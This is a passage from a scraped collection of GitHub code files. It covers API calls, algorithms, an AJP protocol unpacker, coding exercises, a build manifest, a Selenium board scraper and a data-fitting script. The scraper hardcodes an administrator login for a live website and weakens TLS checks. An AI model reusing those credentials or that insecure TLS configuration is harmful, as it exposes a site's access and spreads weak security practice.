consulta\nnome_arquivo = 'CNPJs.txt'\nendereco = diretorio + nome_arquivo\ncria_arquivo(endereco)\n\nlista_cnpj = []\ni=0\n\nwhile i <= len(total_cnpj):\n lista_cnpj = total_cnpj[i:i+3]\n i += 3\n print(lista_cnpj)\n lista_dados = api_cnpj(lista_cnpj, len(total_cnpj))\n j=0\n for j in range(len(lista_dados)):\n atualizar_arquivo(endereco, lista_dados[j])","repo_name":"AndreTsuji/estudo-python","sub_path":"api_cnpj.py","file_name":"api_cnpj.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6817600749","text":"#! /usr/bin/python3\n\nimport json\nimport sys\n\nwith open(\"cgminer.conf\", \"w\") as file:\n try:\n cgminerconf = json.load(sys.stdin)\n except:\n file.close()\n exit(1)\n file.write(json.dumps(cgminerconf, indent=4, separators=(',', ':'), sort_keys=True))\n file.close()\n\n","repo_name":"arijan/cgmrrd","sub_path":"putconf.py","file_name":"putconf.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"71134794248","text":"from random import randint, shuffle, seed\r\n\r\n\r\ndef partition(T, p, r):\r\n T[p], T[r] = T[r], T[p]\r\n x = T[r]\r\n i = p-1\r\n for j in range(p, r):\r\n if T[j] < x:\r\n i += 1\r\n T[i], T[j] = T[j], T[i]\r\n T[r], T[i+1] = T[i+1], T[r]\r\n return i+1\r\n\r\n\r\ndef median_of_five(T, p, r, step):\r\n for i in range(r, p, -step):\r\n for j in range(p, i, step):\r\n if T[j] > T[j+step]:\r\n T[j], T[j+step] = T[j+step], T[j]\r\n tmp = p+step*(((r-p)//step)//2)\r\n T[p], T[tmp] = T[tmp], T[p]\r\n\r\n\r\ndef select(T, p, r):\r\n step = 1\r\n while r-p >= step:\r\n for i in range(p, r, 5*step):\r\n median_of_five(T, i, min(i+5*step-1, r), step)\r\n step *= 5\r\n r = r-r % (step)\r\n\r\n\r\ndef linearselect(T, k):\r\n p = 0\r\n r = len(T)-1\r\n while True:\r\n select(T, p, r)\r\n q = partition(T, p, r)\r\n if q == k:\r\n return T[q]\r\n elif k < q:\r\n r = q-1\r\n else:\r\n p = q+1\r\n\r\n\r\nseed(42)\r\n\r\nn = 11\r\nfor i in range(n):\r\n A = list(range(n))\r\n shuffle(A)\r\n print(A)\r\n x = linearselect(A, i)\r\n if x != i:\r\n print(\"Blad podczas wyszukiwania liczby\", i)\r\n exit(0)\r\n\r\nprint(\"OK\")\r\n","repo_name":"BlazejNowicki/ASD","sub_path":"offline/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"23126656402","text":"from bayserver_core.bay_log import BayLog\nfrom bayserver_core.sink import Sink\nfrom bayserver_core.protocol.command_unpacker import CommandUnPacker\n\nfrom bayserver_docker_ajp.ajp_type import AjpType\nfrom bayserver_docker_ajp.command.cmd_data import CmdData\nfrom bayserver_docker_ajp.command.cmd_end_response import CmdEndResponse\nfrom bayserver_docker_ajp.command.cmd_forward_request import CmdForwardRequest\nfrom bayserver_docker_ajp.command.cmd_get_body_chunk import CmdGetBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_body_chunk import CmdSendBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_headers import CmdSendHeaders\nfrom bayserver_docker_ajp.command.cmd_shutdown import CmdShutdown\n\nclass AjpCommandUnPacker(CommandUnPacker):\n\n def __init__(self, handler):\n self.cmd_handler = handler\n self.reset()\n\n def reset(self):\n pass\n\n def packet_received(self, pkt):\n\n BayLog.debug(\"ajp: packet received: type=%d data len=%d\", pkt.type, pkt.data_len())\n\n if pkt.type == AjpType.DATA:\n cmd = CmdData()\n\n elif pkt.type == AjpType.FORWARD_REQUEST:\n cmd = CmdForwardRequest()\n\n elif pkt.type == AjpType.SEND_BODY_CHUNK:\n cmd = CmdSendBodyChunk(pkt.buf, pkt.header_len, pkt.data_len)\n\n elif pkt.type == AjpType.SEND_HEADERS:\n cmd = CmdSendHeaders()\n\n elif pkt.type == AjpType.END_RESPONSE:\n cmd = CmdEndResponse()\n\n elif pkt.type == AjpType.SHUTDOWN:\n cmd = CmdShutdown()\n\n elif pkt.type == AjpType.GET_BODY_CHUNK:\n cmd = CmdGetBodyChunk()\n\n else:\n raise Sink()\n\n cmd.unpack(pkt)\n return cmd.handle(self.cmd_handler) # visit\n\n def need_data(self):\n return self.cmd_handler.need_data()\n","repo_name":"baykit/BayServer_Python","sub_path":"packages/bayserver-docker-ajp/bayserver_docker_ajp/ajp_command_unpacker.py","file_name":"ajp_command_unpacker.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36173358057","text":"# Átváltás római számról arab számra\r\n\r\n# Római számjegyek\r\nromai = {'I':1,\r\n 'V':5,\r\n 'X':10,\r\n 'L':50,\r\n 'C':100,\r\n 'D':500,\r\n 'M':1000}\r\n\r\nwhile True:\r\n # Beolvasás\r\n be = input('Római szám: ').upper()\r\n if be == '':\r\n break\r\n # Számjegyek értéke\r\n \r\n # számjegyek előjele\r\n \r\n # Összegzés és kiírás\r\n \r\n","repo_name":"radamhu/prog101","sub_path":"python101/python2/16 Szótárak 1/Források/romai.py","file_name":"romai.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36713052941","text":"class LinkedList:\n def __init__(self):\n \"\"\"Initializes an empty linked list with a null head\"\"\"\n self.head = None\n\n def kth_from_end(self, k):\n \"\"\"\n Takes an integer k as input and returns the value of the node that is k places from the tail of the linked list.\n\n Args:\n k (int): The index of the node from the tail of the linked list.\n\n Returns:\n int: The value of the node that is k places from the tail of the linked list.\n\n Raises:\n ValueError: If k is less than 0 or greater than the length of the linked list.\n \"\"\"\n if k < 0:\n raise ValueError(\"k must be a positive integer\")\n\n p1 = self.head\n p2 = self.head\n\n for i in range(k):\n if p1 is None:\n raise ValueError(\"k is greater than the length of the linked list\")\n p1 = p1.next\n\n if p1 is None:\n return self.head.value\n\n while p1.next is not None:\n p1 = p1.next\n p2 = p2.next\n\n return p2.value\n\n def find_middle(self):\n \"\"\"\n Returns the value of the node at the middle of the linked list.\n\n Returns:\n int: The value of the node at the middle of the linked list.\n\n \"\"\"\n if self.head is None:\n return None\n\n p1 = self.head\n p2 = self.head\n\n while p1 is not None and p1.next is not None:\n p1 = p1.next.next\n p2 = p2.next\n\n return p2.value\n","repo_name":"mohammadalsmadi2000/data-structures-and-algorithms","sub_path":"linked-list-kth/linked-list-kth/linked-list-kth.py","file_name":"linked-list-kth.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6977416249","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\nimport os\nimport stdlib\nfrom stdlib.template.configure import configure\nfrom stdlib.template import autotools\nfrom stdlib.manifest import manifest\n\n\n@manifest(\n name='sqlite',\n category='dev-libs',\n description='''\n A C library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine.\n ''',\n tags=['sql', 'db'],\n maintainer='grange_c@raven-os.org',\n licenses=[stdlib.license.License.PUBLIC_DOMAIN],\n upstream_url='https://www.sqlite.org/',\n kind=stdlib.kind.Kind.EFFECTIVE,\n versions_data=[\n {\n 'semver': '3.30.1',\n 'fetch': [{\n 'url': 'https://sqlite.org/2019/sqlite-autoconf-3300100.tar.gz',\n 'sha256': '8c5a50db089bd2a1b08dbc5b00d2027602ca7ff238ba7658fabca454d4298e60',\n }],\n },\n ],\n)\ndef build(build):\n os.environ['CFLAGS'] += '''\\\n -DSQLITE_ENABLE_FTS3=1 \\\n -DSQLITE_ENABLE_FTS4=1 \\\n -DSQLITE_ENABLE_COLUMN_METADATA=1 \\\n -DSQLITE_ENABLE_UNLOCK_NOTIFY=1 \\\n -DSQLITE_ENABLE_DBSTAT_VTAB=1 \\\n -DSQLITE_SECURE_DELETE=1 \\\n -DSQLITE_ENABLE_FTS3_TOKENIZER=1\\\n '''\n\n return autotools.build(\n configure=lambda: configure(\n '--enable-fts5',\n )\n )\n","repo_name":"raven-os/nbuild-manifests","sub_path":"dev-libs/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"45120930295","text":"import requests, xmltodict, json\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom urllib import parse\r\nimport datetime as dt\r\nimport urllib3\r\nimport traceback\r\nimport os\r\nimport openpyxl\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urljoin\r\nfrom selenium import webdriver\r\n\r\n#공지사항에 쓰임 목적에따라 달라질 수 있음\r\nfrom selenium.common import UnexpectedAlertPresentException\r\n\r\n\r\ndef void(): #main 격의 자리이며 그외 함수는 이 위에 def로 지정\r\n while True:\r\n try:\r\n print(\"hello\")\r\n c = input(\"종료하려면 x를 누르세요 : \")\r\n if c == 'x':\r\n break\r\n time.sleep(1)\r\n\r\n ### 로그인 창 ###\r\n\r\n USER=\"admin\"\r\n PW=\"adminadmin\"\r\n\r\n urls = 'https://www.costac.co.kr/bbs/login.php'\r\n driver = webdriver.Chrome('C:/Users/skflc/PycharmProjects/pythonProject/chromedriver_win32/chromedriver.exe')\r\n driver.get(urls)\r\n\r\n driver.find_element_by_id('login_id').send_keys('admin')\r\n driver.find_element_by_id('login_pw').send_keys('adminadmin')\r\n driver.find_element_by_css_selector('#login_fs > input.btn_submit').click()\r\n\r\n aaa = input(\"종료하려면 x를 누르세요 : \")\r\n if aaa == 'x':\r\n break\r\n #이상 로그인 및 테스트구역\r\n mCols = []\r\n df = pd.DataFrame(columns=mCols)\r\n excel_file = openpyxl.Workbook()\r\n excel_sheet = excel_file.active\r\n excel_sheet.title = '테스트'\r\n excel_sheet.append(['이', '액셀은', '역순으로', '작성', '되었음', '22-06-20']) # 정순처리시 주석\r\n excel_sheet.append(['번호', '제목', '내용(selectone)', '내용(select)', '작성자', '작성시각'])\r\n dir = 'C:\\\\Users\\\\skflc\\\\Desktop\\\\test0615\\\\testS0624Fin.xlsx'\r\n btitles = []\r\n brticles = []\r\n brticles2 = []\r\n buths = []\r\n btimes = []\r\n\r\n j = 1 # 글번호\r\n\r\n # 여기서 부터 반복문\r\n for i in range(820, 3, -1): #정순은 4,813\r\n try:\r\n jj = str(j)\r\n ii = str(i)\r\n url = 'https://www.costac.co.kr/bbs/board.php?bo_table=form_service&wr_id=' + ii\r\n #url = 'https://www.costac.co.kr/bbs/board.php?bo_table=sim_report&wr_id=' + ii\r\n print(url)\r\n # source = requests.get(url, verify=False)\r\n source = driver.get(url)\r\n\r\n # 분기점 source.status_code\r\n\r\n # html = source.text\r\n html = driver.page_source\r\n soap = BeautifulSoup(html, 'html.parser')\r\n article = soap.select_one('#bo_v_con')\r\n article2 = soap.select('#bo_v_con')\r\n title = soap.select_one('#bo_v_title') # 제목\r\n auth = soap.select_one('#bo_v_info > ul > li:nth-child(1) > strong > span') # 작성자\r\n wtime = soap.select_one('#bo_v_info > ul > li:nth-child(2) > strong') # 작성시각\r\n\r\n #제목 작성자, 작성시각은 gettext를 들어감\r\n # form_result > table\r\n # form_result > div:nth-child(2) > table.table1\r\n # form_result > div:nth-child(4) > table\r\n # form_result > div:nth-child(2) > table.gunmul\r\n # table/table1,gunmul,table3,gdTable\r\n # content > section > article > form > div > table:nth-child(1)\r\n\r\n\r\n\r\n # time.sleep(1)\r\n\r\n ## print(soap)\r\n # print('-----------------------------')\r\n # print(article)\r\n # print('-----------------------------')\r\n ## print(article.get_text())\r\n brticle = str(article)\r\n brticle2 = str(article2)\r\n crticle = article.text\r\n drticle = article.string\r\n\r\n\r\n\r\n #btitle = str(title)\r\n #buth = str(auth)\r\n #btime = str(wtime)\r\n btitle = title.get_text()\r\n buth = auth.get_text()\r\n btime = wtime.get_text()\r\n btime = '20'+btime+' 00:00:'+str(i//180)+str(i%10)\r\n #print(btime)\r\n\r\n #time.sleep(20)\r\n excel_sheet.append([jj, btitle, brticle, brticle2, buth, btime])\r\n btitles.append(btitle)\r\n brticles.append(brticle)\r\n 
brticles2.append(brticle2)\r\n buths.append(buth)\r\n btimes.append(btime)\r\n\r\n #excel_sheet.append(['공백'])\r\n print('-----------'+jj + '번째 실행------------------------------------------------------------------------------------------------------------------------')\r\n print(brticle + \" \" + brticle2 + \" \" + buth + \" \" + btime + \" \" + btitle)\r\n j = j + 1\r\n\r\n # time.sleep(2) # 원인이 시간이 이유라면? 아니다 다만\r\n\r\n #eee = input(\"종료하려면 x를 누르세요 : \")\r\n\r\n #if eee == 'x':\r\n #break\r\n except UnexpectedAlertPresentException as UAPE:\r\n print(UAPE)\r\n print(\"일시적인 오류이거나 글이 존재하지 않습니다.\")\r\n print(url)\r\n time.sleep(1)\r\n excel_sheet.append(['오류'])\r\n continue\r\n # pass\r\n\r\n ## source = requests.get(url, verify=False)\r\n\r\n ## article = soap2.select_one('#bo_v_con')\r\n ## article2 = soap2.select_one('#bo_v_atc')\r\n\r\n\r\n\r\n\r\n time.sleep(1)\r\n # 글내용 bo_v_con\r\n\r\n excel_file.save(dir)\r\n df['btitle'] = btitles\r\n df['brticle'] = brticles\r\n df['brticle2'] = brticles2\r\n df['buth'] = buths\r\n df['btime'] = btimes\r\n df.to_excel('C:/Users/skflc/Desktop/' + ' 0624finS2.xlsx')\r\n\r\n\r\n time.sleep(1)\r\n print(\"액셀파일 생성이완료됨\")\r\n d = input(\"종료하려면 x를 누르세요 : \")\r\n if d == 'x':\r\n break\r\n\r\n except Exception as e:\r\n print(e)\r\n print(traceback.format_exc())\r\n print('예기치 못한 오류가 발생했습니다.')\r\n print('3초뒤 다시 시작합니다')\r\n time.sleep(3)\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) #경고무시창\r\nrequests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'\r\ntry:\r\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += 'HIGH:!DH:!aNULL'\r\nexcept AttributeError:\r\n # no pyopenssl support used / needed / available\r\n pass\r\n\r\n# 일단 복붙은 했는데 도저히 무슨원린지 모르겠다... 이건 verify 문제도 아닌가본데? 참고 : https://stackoverflow.com/questions/38015537/python-requests-exceptions-sslerror-dh-key-too-small\r\n\r\nvoid()\r\n\r\n\r\n# 거의 모든경우 이렇게 진행\r\n# 페이지번호도 따로 읽어야 한다. 페이지의 모든경우를 다읽었을 경우에도 다음페이지로 넘어가는 코드가 있어야한다. 단 번호만으로도 가능한경우엔 상관없다.\r\n# 개별 번호 역시 순차적으로 되지 않기 때문에 200인 경우에만 시도하도록 짜야한다.\r\n# if 200 = append 글내용 else = append error 404\r\n# 0624 내용자체는 문제가 없는데 자꾸 오류가 나는걸 보아 pyxl.append에서 문제가 나는것 같은데...\r\n# 파이엑셀로 저장하던걸 pandas로 액셀저장하도록 한 버전 pyexcel append가 어째서인지 짤림","repo_name":"kimjunghyun2/mystreamlit","sub_path":"0624crawiling.py","file_name":"0624crawiling.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"47172598580","text":"# Given a string s consisting of small English letters, find and return the first instance of a non-repeating character in it. If there is no such character, return '_'.\n\n# Example\n\n# For s = \"abacabad\", the output should be\n# first_not_repeating_character(s) = 'c'.\n\n# There are 2 non-repeating characters in the string: 'c' and 'd'. Return c since it appears in the string first.\n\n# For s = \"abacabaabacaba\", the output should be\n# first_not_repeating_character(s) = '_'.\n\n# There are no characters in this string that do not repeat.\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string s\n\n# A string that contains only lowercase English letters.\n\n# [output] char\n\n# The first non-repeating character in s of '_' if there are no characters that do not repeat.\nfrom collections import Counter\ndef first_not_repeating_character(s):\n# use a set for unique characters\n# or use a count of each character. if only 1 return character\n# else return \"_\"\n count = Counter(s)\n returnchar = \"\"\n boolean = False\n for num in count:\n if count[num] == 1:\n returnchar += num\n boolean = True\n break\n if boolean == False:\n returnchar = \"_\"\n return returnchar","repo_name":"jordan-hanson/codesignal-practice","sub_path":"Python/firstnotrepeatingcharacter.py","file_name":"firstnotrepeatingcharacter.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20724454115","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.8.10\n num = {}\n for i in range(len(A)):\n if A[i] in num:\n num[A[i]] += 1\n else:\n num[A[i]] = 1\n\n for elemt in num:\n if num[elemt] % 2 != 0:\n return elemt","repo_name":"Angela-OH/Algorithm","sub_path":"codility/lesson2_2.py","file_name":"lesson2_2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43346014501","text":"\"\"\"\nIncluded here: Day 10 of 30 Days to Code.\nSee the Jupyter Notebook for more notes related to this tutorial.\n\"\"\"\n\n#func that converts decimal to binary, returns string of bits, only works for <= 16-bit numbers\ndef Decimal2Binary(num): \n def innerAlg(num):\n #base case\n if num == 1: #last step has a dividend of 1\n return str(num % 2) #last steps bit is the left-most bit overall\n #recursive case\n remain = num % 2 #becomes bit for this step of the conversion\n #integer division here to get the dividend for the next step\n dividend = num // 2 #becomes dividend of next step, divisor of 2 always\n return str(innerAlg(dividend)) + str(remain) #bit from first step is the right-most bit\n\n #this function combines the output from before with leading zeros to represent the binary \n #number as a 16-bit or 2-byte number\n def innerFormat(string):\n bits = len(string) #number of bits from conversion to binary\n count = 16 - bits #finding number of needed leading zeros\n leadingZero = count * '0' #creating string to horizontally cat to binary number\n return leadingZero + string #returning the 16-bit number\n str1 = innerAlg(num) #calling the conversion scripts\n return innerFormat(str1) #returning the converted number, in binary, as a string\n \nDecimalNumber = 55 #number to convert to binary \nprint(f'{DecimalNumber} as a 16-bit binary number is:',Decimal2Binary(DecimalNumber))\n\n#Part of the Day 10 Coding Challenge, supposed to convert number then provide \n#the largest grouping of consecutive bits that are equal to 1\nBinStr = Decimal2Binary(DecimalNumber)\nBinaryNumber = BinStr\nBinStr = BinStr.split('0') #splits up the string at the zeros, reults in the groupings of 1's and empty elements\n#where the zeros once were\n\n#iterate through the string array, take only the elements that are not empty, find the length of each element,\n#find the element with the largest length, return that as the largest grouping of consecutive ones in the binary number.\nBinCount = max([len(num) for num in BinStr if num != ''])\nprint(f'The largest grouping of consecutive ones in the binary representation of {DecimalNumber} is:',BinCount)\n\ndef Binary2Decimal(num):\n #base cases\n if len(num) == 1 and num == str(1): #if the right most bit is 1, raise it tot he zero power\n return 2**0\n if len(num) == 1 and num != str(1): #if the right most bit is zero, pass back a zero for the summation of converted bits\n return 0\n\n #recursive cases\n bitlen = len(num) - 1 #get the exponent of the 2 for this bit\n current_bit = num[0] #keep the current bit to see if it'll become 0 or 2 raised to the exponent \n num = num[1::] #only pass the following right bits to the next step of the recursion\n if current_bit == str(1): #if the current bit is one, raise it to the exponent and got to the next recursion step\n return int(Binary2Decimal(num)) + 2**bitlen\n return int(Binary2Decimal(num)) + 0 #if the current bit is zero, make the conversion 0 and go to the next step of recursion \n\nprint(f'The binary number {BinaryNumber} represented in decimal is:',Binary2Decimal(BinaryNumber))","repo_name":"freddydrew/HackerRank","sub_path":"30DaysToCode/HowToBinaryPractice.py","file_name":"HowToBinaryPractice.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3223981331","text":"import warnings\nwarnings.filterwarnings('ignore')\n\nimport json, os, re, scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport matplotlib.colors as mcolors\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport seaborn as sns\nfrom fitter import Fitter, get_common_distributions, get_distributions\n\n\n\n# This finds our json files\nprint(\"This finds our json files\")\nloop = True\nwhile loop:\n# path_to_json = str(input(\"Directory of Json files (which should starts and ends with /): \"))\n path_to_json = './results/'\n # Store the in List called: json_files\n try:\n # Store the in List called: json_files\n json_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\n except:\n # if path is empty will get Error\n print(\"Error\")\n\n if len(json_files) != 0:\n loop = False\n\n\n# Here I define a list to store each json file as a DataFrame in a list\njson_list = list()\n\n# we need both the json and an index number so use enumerate()\nfor index,js in enumerate(json_files):\n with open(os.path.join(path_to_json, js)) as json_file:\n # Finding the location of gNodeB\n g_loc = re.findall('[x-y-p][\\d]{1,100}',js)\n\n # Loading Json\n json_text = json.load(json_file,parse_float=True)\n\n # Create DataFrame\n j_pd = pd.DataFrame.from_dict(json_text.items(),dtype=float)\n j_pd.columns = ['Location','BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]\n\n # For taking locations as a seperate DF\n if index == 0:\n # Append seperatly\n json_list.append(j_pd[['Location']])\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n else :\n # for rest of indexes except '0'\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n\n# Example of js\n# bs_uc3_ls50_ws50_x75_y50_n5000_p100.json\n\n\n# In this part we make our final DataFrame\n\n# combine DataFrames Except Location\nfinal = json_list[1]\nfor i in range(2,len(json_list)):\n final = pd.concat([final, json_list[i]], axis=1)\n\n#-----------------------------------------------\n# human sorting (also known as natural sorting):\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\ndef natural_keys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ]\n#-----------------------------------------------\n\n# sort the columns by using human sorting\nfinal = final.reindex(sorted(final.columns, key=natural_keys), axis=1)\n\n# Add Location DataFrame to the final DataFrame\nfinal = pd.concat([json_list[0], final], axis=1)\n\n# Convert Location of UE to Numpy Array\nUE_Loc = np.zeros([2500,2])\nfor i in range(len(final['Location'])):\n d = re.findall('[\\d]{0,100}',final['Location'][i])\n UE_Loc[i] = [int(d[0])/2,int(d[4])/2]\n\n# Create DataFrame of the UE Location\nlocdf=pd.DataFrame(UE_Loc,columns=['X','Y'])\n\n# Add locatio DataFrame to the Main DataFrame\nfinal = pd.concat([locdf, final], axis=1)\ndel final['Location']\n\n# Convert Location of gNodeB to Numpy Array\ngNodeB_Loc = np.zeros([int((len(final.columns)-2)/4),2])\nfor i in range(0,len(gNodeB_Loc)):\n d = re.findall('[\\d]{2,3}',final.columns[i*4+2])\n gNodeB_Loc[i] 
= [int(d[0])/2,int(d[1])/2]\n\nprint(final.head())\nprint(final[final.columns[2:]].describe())\n\n## Defining the Colors for ploting\n# Colors which will be used in plots\ncolors = ['tab:red', 'tab:blue', 'tab:green', 'tab:pink', 'tab:olive', 'tab:gray', 'tab:brown', 'tab:orange', 'tab:purple']\n\nsort_colors = True\nif sort_colors is True:\n by_hsv = sorted((tuple(mcolors.rgb_to_hsv(mcolors.to_rgb(color))),name) for name, color in mcolors.CSS4_COLORS.items())\n names = [name for hsv, name in by_hsv]\nelse:\n names = list(colors)\n\n\n# 3D contour plot lines\nnumberOfContourLines = 16\ngraphWidth = 800 # units are pixels\ngraphHeight = 600 # units are pixels\n\n\n## Class for finding the fit of the data and ploting the results\nclass fit_func:\n '''\n this class in put is the Data and the A0\n Dataset name\n Data is the x,y,z\n A0 is the location of the gNodeB of the data which is ploting\n '''\n def __init__(self,dataset_name,data,A0):\n self.dataset_name = dataset_name\n self.data = data\n self.A0 = A0\n\n def dist_plot(self, dataset_name):\n '''\n this def will get the data and plots the distribution and\n find the best fit for the data distribution to get the sigma and\n the mean of the data\n '''\n # sns.set_style('white')\n # sns.set_context(\"paper\", font_scale = 2)\n # sns.displot(data=final[[dataset_name]], kind=\"hist\", bins = 1000, aspect = 1.5)\n\n BLER = final[[dataset_name]].values\n f = Fitter(BLER,distributions=['gamma','lognorm',\"beta\",\"burr\",\"norm\"])\n\n f.fit()\n print(f.summary())\n best_fit = f.get_best(method = 'sumsquare_error')\n # key = best_fit.keys()\n # key, value = best_fit.items()\n if best_fit.keys() == 'lognorm':\n for key, value in best_fit.items():\n print(\"best fit is {}\".format(key))\n for k, v in value.items():\n if k == 's':\n s = v\n if k == 'loc':\n loc = v\n if k == 'scale':\n scale = v\n sigma = s\n mean_1 = scipy.stats.lognorm.mean(s, loc=loc, scale=scale)\n print(\"\\n Best Fit on distribution: {} | sigma: {} | mean: {} \".format(best_fit, sigma, mean_1))\n\n def ScatterPlot(self,data):\n '''\n this def will plots the scatter plot of the Data\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n\n plt.grid(True)\n axes = Axes3D(f)\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n axes.scatter(x_data, y_data, z_data)\n axes.set_title('Scatter Plot for {} Data'.format(self.dataset_name))\n axes.set_xlabel('X Data')\n axes.set_ylabel('Y Data')\n axes.set_zlabel('BLER Data')\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n\n\n def SurfacePlot(self,func, data,fittedParameters):\n '''\n this def will plots the data and the surface fit\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n plt.grid(True)\n axes = Axes3D(f)\n\n # Data of the plot\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n # defining the X and Y amd the Z of plot\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=1, antialiased=True)\n\n axes.scatter(x_data, y_data, z_data) # show data along with plotted surface\n\n axes.set_title('Surface Plot for {} Data and the Fit 
Surface'.format(self.dataset_name)) # add a title for surface plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n axes.set_zlabel('BLER') # Z axis data label\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def ContourPlot(self,func, data, fittedParameters):\n '''\n this def will plot the counter plot of the data to have\n the sight of BLER zones\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n axes = f.add_subplot(111)\n\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot(x_data, y_data, 'o')\n\n axes.set_title('Contour Plot for {} Data and shows the zone of BLERs'.format(self.dataset_name)) # add a title for contour plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n\n CS = plt.contour(X, Y, Z, numberOfContourLines, colors='k')\n plt.clabel(CS, inline=1, fontsize=10) # labels for contours\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def func(self,data, alpha, beta,a ,b):\n x1 = data[0]\n y1 = data[1]\n # A0 = data[2]\n ## 2D\n x = np.linspace(min(x1), max(x1), int(np.sqrt(len(x1))))\n y = np.linspace(min(y1), max(y1), int(np.sqrt(len(y1))))\n X , Y = np.meshgrid(x,y)\n Z = alpha * (((X-A0[0]+a)**2)) + beta*((Y-A0[1]+b)**2)\n return Z.ravel()\n\n\n def fit_c(self):\n '''\n this the is using ...\n for fit...\n boundaries ...\n method ...\n maxfev ...\n x_scale and f f_scale ...\n telorance ...\n loss ...\n function ...\n '''\n x,y = self.data[0],self.data[1]\n\n # defining fitting Function\n\n loop = True\n while loop:\n\n # getting mean and sigma of data\n self.dist_plot(self.dataset_name)\n\n initialParameters = [.0001, .0001, 0 , 6]\n # here a non-linear surface fit is made with scipy's curve_fit()\n tol = 10**-15\n fittedParameters, pcov = scipy.optimize.curve_fit(self.func, [x,y], z, bounds=([ 0, 0, -10, -10], [ .001, .001, 10, 10]),method='trf',\n p0 = initialParameters,maxfev=10000,ftol=tol, xtol=tol, gtol=tol,\n x_scale=0.1, loss='cauchy', f_scale=0.1, diff_step=None, verbose = 2)\n # ,sigma = 2.520656362227073/zData,absolute_sigma=False,maxfev=1000\n # sigma has been taken from fitter library and the fit was lognoraml\n # scipy.optimize.minimize()\n\n print('fitted prameters', fittedParameters)\n 